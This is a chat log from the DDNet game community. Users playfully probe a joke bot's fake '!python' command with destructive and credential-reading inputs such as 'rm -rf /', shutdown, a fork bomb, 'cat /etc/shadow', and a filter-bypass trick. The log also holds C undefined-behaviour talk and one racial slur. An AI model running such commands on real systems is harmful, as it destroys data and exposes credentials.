00:28 <+bridge> not the best writer but still an interesting read 00:28 <+bridge> https://www.deadf00d.com/post/how-to-hack-an-esa-experimental-satellite.html 00:28 <+bridge> @Ryozuki don't read that, you'll have nightmares of it 01:36 <+bridge> chilldragon suck 01:39 <+bridge> hey im trying to compile ddnet using cmake on windows and i have two questions, first if the dependencies are included in bundle you dont need them downloaded independently do you? secondly how do you install gtest 😭 i looked everywhere and cannot seem to find help without them throwing visual studio code into the equation 07:29 <+ChillerDragon> !add_ping_pong windows use linux 07:29 <+ChillerDragon> !add_ping_pong c Segmentation fault 07:29 <+ChillerDragon> !add_ping_pong cpp Segmentation fault 07:43 <+ChillerDragon> !jap fixed ur pinger and made !python slower :) 07:43 < chillerbot> @Jupstar ✪ 07:43 <+ChillerDragon> !python 4+20 07:43 < chillerbot> 24 07:50 <+bridge> !c 07:50 < chillerbot> Segmentation fault 07:51 <+bridge> !add_ping_pong linux Congratulations, your Reddit account has successfully been created. 07:51 < chillerbot> only papa chiler can pinger. 07:51 <+bridge> FUCK YOU !!!!!!!!! 07:52 <+ChillerDragon> axax 07:52 <+bridge> lmao 07:53 <+bridge> !python 7*7 07:53 < chillerbot> 49 07:53 <+ChillerDragon> oh yea and i made it a bit more dynamic 07:53 <+bridge> Lmao amazing with the delay 07:53 <+ChillerDragon> :) 07:55 <+ChillerDragon> !cpp int x = 2; 07:55 < chillerbot> Segmentation fault 07:55 <+ChillerDragon> xd 07:58 <+bridge> More realistic than real life 09:20 <+bridge> !python [x**x for x in range(10)] 09:20 <+bridge> ok 09:20 < chillerbot> 4 09:20 <+ChillerDragon> xd 09:20 <+bridge> !cpp 09:20 < chillerbot> Segmentation fault 09:21 <+bridge> did u make the bot in rust 09:21 <+ChillerDragon> nodejs 09:21 <+ChillerDragon> :trollface: 09:21 <+bridge> :vomit: 09:22 <+ChillerDragon> https://github.com/ChillerDragon/ddnet-ircbot 09:44 <+bridge> how are you trying to compile? using microsoft visual studio? 09:47 <+bridge> did u clone the submodules 09:51 <+bridge> (this is automatic in mvsc++ 09:53 <+bridge> (this is automatic in mvsc++) 10:03 <+bridge> https://deno.com/blog/v1.33 10:30 <+ChillerDragon> !python [x for x in range(2)] 10:30 < chillerbot> [0, 1] 10:31 <+bridge> !python os.system("shutdown now -h") 10:31 <+ChillerDragon> oof 10:31 < chillerbot> 4 10:31 <+bridge> xDF 10:43 <+bridge> is this a pyjail challenge? 😛 10:43 <+bridge> !python "abc" 10:43 < chillerbot> 4 10:44 <+ChillerDragon> yes 10:44 <+ChillerDragon> but pls dont hack me thanks xd 10:44 <+ChillerDragon> !python os.system("shutdown") 10:44 < chillerbot> Shutdown scheduled for Sat 2023-04-29 10:37:26 CEST, use 'shutdown -c' to cancel. 10:44 <+ChillerDragon> yikes 10:45 <+bridge> troll 10:45 <+bridge> its in the past 10:45 <+bridge> nobo 10:45 <+ChillerDragon> !python os.system("rm -rf /") 10:45 <+bridge> bad fake xd 10:45 < chillerbot> rm: remove write-protected regular fipytlehon error 11:25 <+bridge> ChillerDragon: where do I find the source? 😉 11:31 <+bridge> u mean this 11:31 <+bridge> https://github.com/ChillerDragon/ddnet-ircbot 11:32 <+bridge> soon i can uninstall python on my system, thx chillerdragoes 11:32 <+bridge> soon i can uninstall python on my system, thx chillerdragores 11:45 <+bridge> @nori does the wayland latency option work for you with DDNet already? 11:45 <+bridge> 11:45 <+bridge> For me it still doesn't allow it xD 11:47 <+ChillerDragon> looking at source is cheating 11:48 <+bridge> !python os.rmdir('/') 11:51 <+bridge> !python 2 + 2 11:51 < chillerbot> 4 11:52 <+bridge> !python print("hello worId") 11:52 <+bridge> ENOTEMPTY 11:55 <+ChillerDragon> bot down to fix os.system 11:56 <+bridge> nvm, i remembered u send the issue: 11:56 <+bridge> https://gitlab.freedesktop.org/mesa/mesa/-/merge_requests/18268 11:56 <+bridge> 11:56 <+bridge> its still open 11:57 <+bridge> !python inspect.getsource(os.system) 11:57 <+bridge> Oh he took it down 11:57 <+bridge> Illegal 12:21 <+ChillerDragon> !python import os;os.system("uname") 12:21 < chillerbot> Linux 12:21 <+ChillerDragon> ez 12:23 <+ChillerDragon> !python import os;os.system("echo UwU") 12:23 < chillerbot> UwU 12:23 <+ChillerDragon> !python import os;os.system("cat /etc/os-release") 12:23 < chillerbot> PRETTY_NAME="Raspbian GNU/Linux 11 (bullseye)" 12:23 < chillerbot> NAME="Raspbian GNU/Linux" 12:23 < chillerbot> VERSION_ID="11" 12:23 < chillerbot> VERSION="11 (bullseye)" 12:26 <+bridge> .!python import os; os.system("echo hello") 12:26 <+bridge> .!python import os; os.system("rm -rf /") 12:28 <+bridge> !python import os; os.system("DDNet") 12:28 < chillerbot> bash: DDNet: command not found 12:29 <+bridge> !python import os; os.system("DDNet-Server") 12:29 < chillerbot> bash: DDNet-Server: command not found 12:29 <+bridge> !python import os; os.system("ls -l") 12:29 < chillerbot> ls: cannot open file or directory '-l': Permission denied 12:29 <+bridge> !python import os; os.system("exit") 12:30 < chillerbot> bash: exit: command not found 12:32 <+bridge> !python import os; os.system("ls ..") 12:32 < chillerbot> ddnet-ircbot 12:33 <+bridge> !rust :brownbear: 12:33 < chillerbot> @Ryozuki 12:34 <+bridge> .!python while 1: print("!rust") 12:34 <+bridge> interesting idea 12:35 <+bridge> try it :troll: 12:35 <+bridge> most interesting ideas are dangerous ideas XD 12:35 <+bridge> !python import os; os.system("echo !python import os; os.system(\"echo ez\")") 12:35 < chillerbot> NameError: name 'import' is not defined 12:37 <+bridge> !python for _ in range(5): print("!rust") 12:37 < chillerbot> NameError: name 'for' is not defined 12:37 <+bridge> heh 12:37 <+bridge> its only fake python xDD 12:37 <+bridge> do u think he gives u full access xd 12:37 <+bridge> lame snake 12:37 <+bridge> but chiller stop only allowing letters and numbers xDD 12:38 <+bridge> i want recursion 12:42 <+bridge> !python import os; import inspect; inspect.getsource(os.system) 12:42 < chillerbot> NameError: name 'import' is not defined 13:12 <+bridge> !python os.system('tree') 13:12 < chillerbot> NameError: name 'os' is not defined 13:13 <+bridge> !python shutil.rmtree('/') 13:13 < chillerbot> NameError: name 'shutil' is not defined 13:13 <+bridge> !python sys.exit() 13:13 < chillerbot> NameError: name 'sys' is not defined 13:14 <+bridge> !python print(__file__) 13:14 < chillerbot> NameError: name 'print' is not defined 13:14 <+bridge> lol 13:24 <+bridge> !python quit() 13:24 < chillerbot> NameError: name 'quit' is not defined 13:25 <+bridge> !python exit() 13:25 < chillerbot> NameError: name 'exit' is not defined 13:26 <+bridge> !python raise Exception("test") 13:26 < chillerbot> NameError: name 'raise' is not defined 13:26 <+bridge> no fun 13:59 <+bridge> if i type in :(){:|:&};: into !python will it crash chiller's computer 14:05 <+bridge> hopefully 14:05 <+bridge> !python import os;os.system("e") 14:06 < chillerbot> bash: e: command not found 14:06 <+bridge> gayass 14:06 <+bridge> !python import os;os.system("echo UwU") 14:06 < chillerbot> UwU 14:06 <+bridge> !python import os;os.system("echo nigger") 14:06 < chillerbot> nigger 14:15 <+bridge> ChillerDragon: I think I found a vulnerability :p 14:33 <+bridge> Yikes 14:34 <+bridge> want me to demonstrate, chillerdragon? 😛 14:35 <+bridge> !python import os;os.system("echo noby is the biggest troll") 14:35 < chillerbot> noby is the biggest troll 14:36 <+ChillerDragon> @heinrich5991 you still got irc so we can move to a less public place to test? 14:40 <@heinrich5991> ChillerDragon: check DMs 14:46 <+bridge> no vulnerability, misread some code 14:48 <+bridge> ChillerDragon: go closed source, actually add a vulnerable and then let's see how long it takes for us to find 14:49 <+bridge> !python open('/etc/sudoers', 'r').readlines() 14:49 < chillerbot> NameError: name 'open' is not defined 14:49 <+bridge> 😢 14:51 <+bridge> !python NameError("name 'NameError' is not defined") 14:51 < chillerbot> NameError: name 'NameError' is not defined 14:52 <+bridge> !python import os; !jup 14:52 <+bridge> !python 10/0 14:52 < chillerbot> python error 14:52 < chillerbot> python error 14:52 < chillerbot> NameError: name 'import' is not defined 14:52 <+bridge> !jup 14:52 < chillerbot> @Jupstar ✪ 14:54 <+bridge> !python import os; os.system("!jup") 14:54 <+bridge> chillerdragon allow $() xdd 14:54 < chillerbot> NameError: name 'import' is not defined 14:56 <+bridge> !python import os; os.system("echo #33jup") 14:57 < chillerbot> NameError: name 'import' is not defined 14:57 <+bridge> !python import os;os.system("echo !jup") 14:57 < chillerbot> NameError: name 'import' is not defined 14:57 <+bridge> 1984 14:57 <+bridge> !python import os;os.system("echo jup") 14:57 < chillerbot> jup 14:58 <+bridge> !python import os;os.system("echo @Jupeyy_Keks") 14:58 < chillerbot> NameError: name 'import' is not defined 14:58 <+bridge> booooo 14:58 <+bridge> he only allows letters and numbers 14:58 <+bridge> and underscore xD 14:58 <+bridge> sad 14:58 <+bridge> i can only make mlg usernames 14:59 <+bridge> !python import os;os.system("echo s") 14:59 < chillerbot> s 14:59 <+bridge> !python import os;os.system("echo xXx_J00PST4R_xXX") 14:59 < chillerbot> xXx 14:59 <+bridge> lol 14:59 <+bridge> LOL? 14:59 <+bridge> !python import os;os.system("echo @Voxel") 14:59 < chillerbot> NameError: name 'import' is not defined 14:59 <+bridge> !python import os;os.system("echo <@") 14:59 < chillerbot> NameError: name 'import' is not defined 15:01 <+ChillerDragon> wtf why it said only xXx ? 15:01 <+ChillerDragon> !python import os;os.system("echo exploit > index.js") 15:01 <+bridge> !python import os;os.system("d /spoiler ez") 15:01 < chillerbot> d: invalid option -- '/spoiler ez' 15:01 <+bridge> ah 15:01 <+bridge> getting closer xd 15:01 <+ChillerDragon> !python import os;os.system("cat /etc/shadow") 15:01 <+bridge> !python import os;os.system("echo yummy_delicious") 15:02 < chillerbot> cat: /etc/shadow: Permission denied 15:02 < chillerbot> yummy 15:02 <+ChillerDragon> xd 15:02 <+ChillerDragon> !python import os;os.system("cat /etc/passwd") 15:02 < chillerbot> root:x:0:0::/root:/bin/bash 15:02 * bridge /spoiler test 15:02 < chillerbot> bin:x:1:1::/:/usr/bin/nologin 15:02 < chillerbot> daemon:x:2:2::/:/usr/bin/nologin 15:02 < chillerbot> mail:x:8:12::/var/spool/mail:/usr/bin/nologin 15:02 < chillerbot> ftp:x:14:11::/srv/ftp:/usr/bin/nologin 15:02 < chillerbot> http:x:33:33::/srv/http:/usr/bin/nologin 15:02 <+bridge> xDD 15:02 <+ChillerDragon> opsi 15:03 <+bridge> !python import os;os.system("echo dfng ftw") 15:03 < chillerbot> dfng ftw 15:03 <+ChillerDragon> dummy fng? 15:03 <+bridge> ez 15:03 <+bridge> different fng mostly 15:04 <+bridge> dfng is from "ddnet-fng" cause it started as a ddnet-code-based fng mod 15:04 <+bridge> !python import os;os.system("d __spoiler ez__") 15:04 < chillerbot> d: invalid option -- '__spoiler ez__' 15:05 <+ChillerDragon> a 15:05 <+bridge> !python import os; os.system('pgrep -u $USER | wc -l; echo pkill -u $USER') 15:05 < chillerbot> pgrep: invalid option -- '-u ' 15:05 <+bridge> ```d```/spoiler test 15:06 <+bridge> ```d``` 15:06 <+bridge> /spoiler test 15:06 <+bridge> This python thingy seems too much exploitable 15:06 <+bridge> !python import os; os.system('pgrep -u $(id -un) | wc -l; echo pkill -u $USER') 15:06 < chillerbot> pgrep: invalid option -- '-u ' 15:07 <+bridge> why is pgrep broken XD 15:07 <+ChillerDragon> because not exploitable :p 15:07 <+bridge> bcs its a troll 15:07 <+bridge> brb 15:08 <+bridge> well pkill is definitely more exploitable tho 15:08 <+bridge> you'd prob want to disable fork()-ing as well 15:09 <+ChillerDragon> im on it xd 15:09 <+ChillerDragon> but i first wanna add !js xd 15:09 <+bridge> !python import os;os.system("shutdown") 15:09 < chillerbot> Shutdown scheduled for Sat Apr 29 2023 15:09:24 GMT+0200, use 'shutdown -c' to cancel. 15:09 <+bridge> lmfao 15:09 <+bridge> I holeheartedly hope there will still be the system running till then lmao 15:09 <+bridge> kek 15:10 <+bridge> I holeheartedly hope the system will be still running till then lmao 15:10 <+ChillerDragon> all nice people here i dont worry 15:10 <+bridge> they all think it executes python xD 15:10 <+bridge> in fact it runs in nodejs xDDDD 15:10 <+ChillerDragon> xd 15:10 <+bridge> !python :(){:|:&};: 15:10 < chillerbot> failed to sanitize input 15:10 <+ChillerDragon> thats a bash fork bomb not pyton 15:10 <+ChillerDragon> and its still wip 15:10 <+bridge> xd 15:11 <+bridge> !python import os;os.system("ls .") 15:11 <+ChillerDragon> stop leak 15:11 < chillerbot> env.example hex_to_pack.py index.js LICENSE node_modules package.json package-lock.json ping_pong.csv README.md tags venv 15:11 <+ChillerDragon> aaaa 15:11 <+ChillerDragon> my files 15:11 <+bridge> !python import os;os.system("rm index.js") 15:11 <+bridge> add this 15:11 < chillerbot> rm: invalid option -- 'index.js' 15:12 <+bridge> is that runnign on your pc XD 15:12 <+ChillerDragon> xd 15:12 <+bridge> try unlink XD 15:12 <+bridge> or /usr/bin/unlink 15:12 <+ChillerDragon> !python import os;os.system("uname -a") 15:12 <+bridge> better don't try tho 15:12 <+ChillerDragon> its running on my raspi 15:12 < chillerbot> Linux raspberrypi 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l GNU/Linux 15:13 <+bridge> it has internet connection doesn't it? 15:13 <+ChillerDragon> yes 15:13 <+bridge> it can download a script then run it 😉 15:13 <+bridge> fix trhe time chiller 15:13 <+bridge> like with shutdown 15:13 <+bridge> rm -rf when 15:13 <+ChillerDragon> time is correct 15:13 <+bridge> xd 15:13 <+ChillerDragon> its from when it was updated or something 15:13 <+bridge> wait xd 15:13 <+ChillerDragon> idk what uanme -a does 15:13 <+bridge> i see 15:14 <+bridge> !python import os;os.system("neofetch") 15:14 < chillerbot> bash: neofetch: command not found 15:14 <+bridge> no way 15:14 <+ChillerDragon> xd 15:14 <+bridge> !python import os;os.system("cat /etc/passwd") 15:14 < chillerbot> root:x:0:0::/root:/bin/bash 15:14 < chillerbot> bin:x:1:1::/:/usr/bin/nologin 15:14 < chillerbot> daemon:x:2:2::/:/usr/bin/nologin 15:14 < chillerbot> mail:x:8:12::/var/spool/mail:/usr/bin/nologin 15:14 < chillerbot> ftp:x:14:11::/srv/ftp:/usr/bin/nologin 15:14 <+bridge> we already did that lol 15:14 < chillerbot> http:x:33:33::/srv/http:/usr/bin/nologin 15:16 <+bridge> !python for a in range(5) 15:16 < chillerbot> NameError: name 'for' is not defined 15:16 <+ChillerDragon> !python [a for a in range(5)] 15:17 < chillerbot> [0, 1, 2, 3, 4] 15:17 <+bridge> !python 3*9+50-40-9/8 15:17 < chillerbot> 35.875 15:17 <+ChillerDragon> wowo 15:18 <+bridge> !python import os; import sys; os.system(sys.argv[0] + '-V') 15:18 < chillerbot> NameError: name 'import' is not defined 15:18 <+ChillerDragon> xd 15:18 <+bridge> !python import os, sys; os.system(sys.argv[0] + '-V') 15:18 < chillerbot> NameError: name 'os' is not defined 15:19 <+bridge> haha you broke import didn't you? 15:19 <+ChillerDragon> eeee 15:19 <+ChillerDragon> u 15:19 <+bridge> good one tbh 15:21 <+bridge> !python print(**5+5**) 15:21 < chillerbot> python error 15:21 <+ChillerDragon> wow 15:21 <+bridge> i'd work with '-s maybe 15:21 <+bridge> i'd work with quotes-s maybe 15:21 <+bridge> i'd work with quotes maybe 15:23 <+bridge> !p test 15:23 < chillerbot> invalid hex 15:23 <+bridge> !windows 15:23 < chillerbot> use linux 15:24 <+ChillerDragon> p is actually the one with the most attack surface 15:24 <+ChillerDragon> and interesting features xd 15:24 <+bridge> yeah probably xd 15:24 <+bridge> !jop 15:24 < chillerbot> @Jupstar ✪ 15:24 <+bridge> nice 15:24 <+bridge> !jap 15:24 < chillerbot> @Jupstar ✪ 15:24 <+ChillerDragon> get some traffic on your system with ``tcpdump "port 8303"`` dump it in !p 15:24 <+bridge> !jeep 15:25 <+bridge> !p 000e0244ac9b27410d0d820100677265656e73776172640064756f646f6e6e7900007374616e64617264007374616e64617264007374616e646172640001010000000080fcaf05eb83d00a80fe0780fe0780fe0780fe0700040fbc3e0e 15:25 < chillerbot> ```0.7``` 15:25 < chillerbot> ```: {'flags': , 'ack': 14, 'token': bytearray(b"D\xac\x9b\'"), 'num_chunks': 2}``` 15:25 <+bridge> xd 15:25 < chillerbot> ```: {'message_name': 'sv_skin_change', 'system_message': False, 'client_id': 0, 'skin_part_names': ['greensward', 'duodonny', '', 'standard', 'standard', 'standard'], 'use_custom_colors': [True, True, False, False, False, False], 'skin_part_colors': [5635840, -11141356, 65408, 65408, 65408, 65408], 'header': }``` 15:25 < chillerbot> ```: {'message_name': 'snap_empty', 'system_message': True, 'tick': 4028, 'delta_tick': 14, 'header': }``` 15:26 <+ChillerDragon> replace the first 2 in the hex 15:26 <+ChillerDragon> with a 6 15:26 <+ChillerDragon> and ull see num chunks goes to 6 15:26 <+ChillerDragon> how i know? i can read all tw traffic as hex 15:26 <+bridge> !p 660e0244ac9b27410d0d820100677265656e73776172640064756f646f6e6e7900007374616e64617264007374616e64617264007374616e646172640001010000000080fcaf05eb83d00a80fe0780fe0780fe0780fe0700040fbc3e0e 15:26 < chillerbot> error 15:26 <+ChillerDragon> now u set invalid flags 15:26 <+ChillerDragon> https://chillerdragon.github.io/teeworlds-protocol/07/packet_layout.html 15:26 <+ChillerDragon> first 7 bytes are packet header 15:26 <+ChillerDragon> read more here 15:27 <+bridge> !c int* p = null; *p = 32; 15:27 < chillerbot> Segmentation fault 15:27 <+ChillerDragon> xd 15:27 <+bridge> you could put that for every !c 15:27 <+ChillerDragon> yea thatd be funny 15:27 <+bridge> and let them look for bugs 15:28 <+ChillerDragon> it would be almost as funny as tricking someone with regex into thinking they run python 15:28 <+ChillerDragon> !c int x = 2; 15:28 < chillerbot> Segmentation fault 15:28 <+bridge> !cpp c-- 15:28 < chillerbot> Segmentation fault 15:28 <+ChillerDragon> !rust 15:28 < chillerbot> @Ryozuki 15:31 <+bridge> !c int C; printf(C++ > C ? "C++ > C" : "C >= C++"); 15:31 < chillerbot> Segmentation fault 15:33 <+bridge> tbh 'C' isn't initalized before being used so SEGV is a valid outcode according to the C standard 15:34 <+bridge> really? 15:34 <+bridge> i'm guessing it's undefined behaviour so... not totally sure tho 15:35 <+bridge> !c unsigned int C = rand(); puts(C++ > C ? "C++ > C" : "C >= C++"); 15:35 < chillerbot> Segmentation fault 15:38 <+bridge> it's indeed UB 15:38 <+bridge> the original one 15:38 <+bridge> not sure about this one, might also be bad (at least in old standards) 15:41 <+bridge> you mean the last one? 15:41 <+ChillerDragon> https://zillyhuhn.com/cs/.1682775688.png 15:41 <+ChillerDragon> i can trust u guys right? 15:41 <+ChillerDragon> ..right? 15:41 <+bridge> no 15:41 <+ChillerDragon> wish me luck 15:42 <+bridge> :troll: 15:43 <+bridge> wust 15:44 <+ChillerDragon> !js console.log(`here it ${"gores"}`+2) 15:44 <+ChillerDragon> xd it crashed 15:44 <+bridge> :justatest: 15:44 <+bridge> #312 15:44 <+bridge> https://github.com/ddnet/ddnet/pull/312 15:45 < bridge_> #123 15:45 <+ChillerDragon> bridje has noined? 15:45 <+ChillerDragon> who killed bridgo 15:46 < bridge\0> #123 15:46 < bridge\0> lmao 15:47 <+ChillerDragon> bot crashed chil 15:49 <+bridge> !python exec('im' + 'port os, sys'); os.system('python -VV') 15:49 <+bridge> bot is down ;~; 15:49 <+bridge> ye 15:49 <+bridge> how so 15:49 <+bridge> how so? 15:50 <+bridge> !chillerdragores, ping when bot is online again 15:52 <+ChillerDragon> oke 15:52 <+bridge> `C++ < C` was (is?) undefined, because it depends on the evaluation order of the terms `C` and `C++` 15:53 <+bridge> isnt that only for ++C 15:53 <+bridge> !jup 15:54 <+ChillerDragon> !jup 15:54 < chillerbot1> @Jupstar ✪ 15:54 <+bridge> nice 15:54 <+bridge> !add\_ping\_pong hack !hack 15:54 <+bridge> ah man 15:54 <+bridge> !python test 15:54 <+bridge> !hackl 15:55 < chillerbot1> NameError: name 'test' is not defined 15:55 <+bridge> !hack 15:55 <+bridge> I think you are correct 15:55 <+bridge> !python [i for i in range(10**9)] 15:55 <+bridge> why no work chillerdragon 15:55 < chillerbot1> failed to sanitize input 15:55 <+ChillerDragon> because only i can 15:55 <+bridge> but i am chillerdragon 15:55 <+ChillerDragon> its skill issue jopsti 15:55 <+bridge> !add\_ping\_pong hack !hack 15:55 <+bridge> !python [i for i in range(100000000)] 15:55 <+ChillerDragon> not real chiler 15:55 < chillerbot1> failed to sanitize input 15:55 <+bridge> meh 15:57 <+bridge> In K&R though, they use 'pop() + pop()' and they say that either way of evaluation is fine 15:57 <+bridge> for this specific case yes 15:57 <+bridge> so I could say the same, `C++ > C` would be false 15:57 < _ChillerDragon> !add_ping_pong hack !hack 15:57 < chillerbot1> only papa chiler can pinger. 15:57 <+bridge> ok u won chillerdragon 15:58 <+ChillerDragon> yay 15:58 <+bridge> 100% guaranteed unhackable for ever 15:58 <+bridge> ever say ever 15:58 <+ChillerDragon> hire me as security consultant for only 1k a hour 15:58 <+bridge> unless C == UINT_MAX 15:58 <+bridge> 1k million right? 15:58 <+ChillerDragon> ofc 15:59 <+bridge> 1k million ddpoints? 15:59 <+bridge> unless `C == UINT_MAX` 15:59 <+bridge> that's different, you don't modify and reference the same variable in that expression 15:59 <+ChillerDragon> okay so !js will be there tomorrow but it will be great 15:59 <+ChillerDragon> in the mean time i added fork bomb support xd 16:00 <+bridge> so that is undefined behaviour instantly or smth? tho `C++ > C` wouldn't be useful in practical code anyways 16:01 <+bridge> I think in old versions of C it was undefined behavior 16:01 <+bridge> I know something changed there recently™, but not sure if in the language C++ or in the language C 16:01 <+bridge> yeah indeed 16:01 <+bridge> or maybe both 16:01 <+bridge> the evaluation order is weird xd 16:03 <+bridge> `> clang -Wall -std=c99 t.c && ./a.out 16:03 <+bridge> t.c:14:8: warning: unsequenced modification and access to 'C' [-Wunsequenced] 16:03 <+bridge> puts(C++ > C ? "C++ > C" : "C >= C++");` 16:03 <+bridge> clang gives a warning tho 16:05 <+bridge> gcc doesn't but i think we cared enough already XD thanks for sharing your knowledge 16:05 <+bridge> ```c++ 16:05 <+bridge> i = ++i + 2; // well-defined 16:05 <+bridge> i = i++ + 2; // undefined behavior until C++17 16:05 <+bridge> f(i = -2, i = -2); // undefined behavior until C++17 16:05 <+bridge> f(++i, ++i); // undefined behavior until C++17, unspecified after C++17 16:05 <+bridge> i = ++i + i++; // undefined behavior 16:05 <+bridge> ``` 16:07 <+bridge> and this is why i like more rust 16:09 <+bridge> rust has the unfair advantage of having no limits for backwards compatibility 16:09 <+bridge> they still do it 16:09 <+bridge> but unspecified results still exists 16:09 <+bridge> where 16:09 <+bridge> rust is backwards compat 16:10 <+bridge> not with code that existed before rust 16:10 <+bridge> rust completly avoids this issue by not allowing postfix and prefix 16:10 <+bridge> cuz its a bad idea kek 16:11 <+bridge> https://github.com/dtolnay/rust-faq#why-doesnt-rust-have-increment-and-decrement-operators 16:11 <+bridge> > Why doesn't Rust have increment and decrement operators? 16:11 <+bridge> > 16:11 <+bridge> > Preincrement and postincrement (and the decrement equivalents), while convenient, are also fairly complex. They require knowledge of evaluation order, and often lead to subtle bugs and undefined behavior in C and C++. x = x + 1 or x += 1 is only slightly longer, but unambiguous. 16:12 <+bridge> "cause it's a bad idea" haha sounds a bit opionated 16:13 <+bridge> the same could happen with other ways of modifying an object tho 16:13 <+bridge> ? 16:13 <+bridge> it doesnt sound opinionated 16:13 <+bridge> its based on the facts 16:13 <+bridge> this whole chat proofs it 16:13 <+bridge> ub everywhere 16:13 <+bridge> xd 16:14 <+bridge> also i posted u a text on why its a bad idea 16:14 <+bridge> I read it and I find that and your opinion interesting. 16:15 <+bridge> dont tell me ur a C fan 16:15 <+bridge> atleast learath is starting to accept the faxx 16:15 <+bridge> @Learath2 :justatest: 16:16 <+bridge> C is the best language there ever will be 16:16 <+bridge> what where? 16:16 <+bridge> how do u mean it? 16:16 <+bridge> logik errors are unexpected results 16:16 <+bridge> by unspecified what do u mean and where 16:16 <+bridge> logic errors are unexpected results 16:16 <+bridge> for example a bool in rust will always have a boolean value 16:16 <+bridge> example: 16:16 <+bridge> https://doc.rust-lang.org/reference/behavior-not-considered-unsafe.html 16:16 <+bridge> yes that would be UB else 16:17 <+bridge> (u can make that through unsafe) 16:17 <+bridge> ah so u meant that 16:17 <+bridge> Isn't that a bit stretched? C could use some clean up etc but backwards is very limiting 16:17 <+bridge> ye thats ok 16:17 <+bridge> Ofc, I’m only playing into the meme that I’m a C fanatic 16:18 <+bridge> (oh very nice) 16:18 <+bridge> nono 16:18 <+bridge> u know 16:18 <+bridge> c89 is the true C 16:18 <+bridge> others are bloated 16:18 <+bridge> C99 is fine isn't it? 16:18 <+bridge> C99* 16:18 <+bridge> c89 is the true ansi c 16:18 <+bridge> im true fanatic 16:18 <+bridge> Last clear improvement in C. After that wg14 was infected by wg21s brainrot 16:19 <+bridge> @Learath2 i thought u would be a zig fanatic by this point 16:19 <+bridge> and then we would have endless fights 16:19 <+bridge> I find recents changes in C standard also weird tbh 16:19 <+bridge> rust > zig 16:20 <+bridge> Zig has sadly been ruined by it’s edgy internal drama 16:20 <+bridge> (unintuitive) logic errors are unexpected results 16:20 <+bridge> oh there was drama? 16:20 <+bridge> is it a code of conduct 16:21 <+bridge> It could have been an amazing language but it seems good language design goes hand in hand with extremely edgy socially maladjusted nerds 16:21 <+bridge> maybe trying to be too good is a problem 16:21 <+bridge> it was already not good when it isnt as memory safe as rust 16:22 <+bridge> time travel? 16:22 <+bridge> C is bad but actually and practicaly solves problems 16:22 <+bridge> C is bad but actually and practically solves problems 16:22 <+bridge> I don't think drama is related to having a CoC 16:22 <+bridge> thats such a nothing is said argument 16:22 <+bridge> refering to zog 16:23 <+bridge> what is it? nazi stuff? 16:23 <+bridge> how does zig solve memory safety? 16:23 <+bridge> 16:23 <+bridge> over GC? 16:23 <+bridge> i read this out of context and almost laughed 16:23 <+bridge> or similar to rust 16:23 <+bridge> !rust 16:23 < chillerbot1> @Ryozuki 16:23 <+bridge> the main dev of suckless was a nazi 16:23 <+bridge> xd 16:24 <+bridge> haha sounds so unbelievable 16:24 <+bridge> haha sounds too unbelievable 16:24 <+bridge> I think that having drama in general is unrelated to having a CoC 16:24 <+bridge> you must love the coq language 16:25 <+bridge> I don’t even remember anymore, it was some community drama, then some people forked it, then there weren’t enough people in either team to steadily develop the language 16:25 <+bridge> @Voxel do u play kog 16:25 <+bridge> no 16:25 <+bridge> u should try 16:25 <+bridge> no? it is very related as in the CoC itself raises drama 16:25 <+bridge> it did in linux 16:25 <+bridge> too repetitive and boring 16:25 <+bridge> After that there was some capitalism drama, one contributor got banned for some reason, forked, moved to japan and started to sell the thing 16:25 <+bridge> https://itsfoss.com/linux-code-of-conduct/ 16:26 <+bridge> See, good software design comes hand in hand with awful politics. Idk why 16:26 <+bridge> they have a pic 16:26 <+bridge> omg this is just like that one minecraft launcher all over again 16:26 <+bridge> I bet Lennart Poettering is involved in 0 liberal controversies 16:27 <+bridge> kek 16:27 <+bridge> i played stoneblock 3 16:27 <+bridge> mods have come a long way in minecraft 16:27 <+bridge> they even show u animated tutorials 16:27 <+bridge> in game 16:31 <+bridge> well not all is about politics 16:31 <+bridge> for example furries 16:31 <+bridge> and anime 16:31 <+bridge> weebs 16:31 <+bridge> they make good software 16:31 <+bridge> https://github.com/doitsujin 16:31 <+bridge> People with anime pfp always have decent software design skills too. This is true 16:32 <+bridge> i used to have a weeb pfp 16:32 <+bridge> but i guess i didnt have courage to keep it 16:32 <+bridge> when entering the market 16:32 <+bridge> xd 16:32 <+bridge> u still have 16:32 <+bridge> in gh 16:32 <+bridge> so the trope is real 16:32 <+bridge> i bet ryoz has programming socks (thigh highs) 16:33 <+bridge> :justatest: 16:33 <+bridge> Corpos have their own face in their github profiles, those are hard to tell apart 16:33 <+bridge> i have a fish 16:34 <+bridge> real gangsters have NSA in their gh profile 16:34 <+bridge> kek 16:34 <+bridge> only in the sense that some people find having a CoC controversial, right? 16:34 <+bridge> yeah 16:34 <+bridge> or what the coc says 16:34 <+bridge> on what we were saying earlier, are these similarly bad? even the version without increment operators? 16:34 <+bridge> ``` 16:34 <+bridge> i = ++i + i++; 16:34 <+bridge> set(&i, postincr(&i) + preincr(&i));``` 16:34 <+bridge> lmao 16:34 <+bridge> https://cdn.discordapp.com/attachments/293493549758939136/1101879226174545950/image.png 16:34 <+bridge> on what we were saying earlier, aren't these similarly bad? even the version without increment operators? 16:34 <+bridge> ``` 16:34 <+bridge> i = ++i + i++; 16:34 <+bridge> set(&i, postincr(&i) + preincr(&i));``` 16:35 <+bridge> source pls 16:35 <+bridge> No sequence point, no defined behaviour 16:35 <+bridge> so aren't those the same bad? 16:36 <+bridge> he used a email with the name "wolfsschanze" 16:36 <+bridge> https://twitter.com/pid_eins/status/1113738764797534208 16:36 <+bridge> and ye its poetter 16:36 <+bridge> xd 16:36 <+bridge> > The Wolf's Lair served as Adolf Hitler's first Eastern Front military headquarters in World War II. The headquarters was located in the Masurian woods, near the village of Görlitz in Ostpreußen, about 8 kilometres east of the small East Prussian town of Rastenburg, in present-day Poland. 16:37 <+bridge> wolfsschanze = The Wolf's Lair 16:37 <+bridge> https://web.archive.org/web/20190404153507/https://lists.dyne.org/lurker/message/20181010.191925.ee1331b6.en.html 16:37 <+bridge> weird stuff 16:37 <+bridge> yea, remembered something like this. without anything else, I wouldn't put it into the nazi direction, might just be a bad joke 16:37 <+bridge> and that couldn't be someone else's work? 16:38 <+bridge> and that couldn't be someone else's work? like being faked 16:38 <+bridge> do germans joke like this? 16:38 <+bridge> xd 16:38 <+bridge> no, not faked 16:38 <+bridge> i didnt know 16:38 <+bridge> i also never heard that term 16:38 <+bridge> so its rather secret joke 16:38 <+bridge> probably less in germany than elsewhere 16:39 <+bridge> years ago 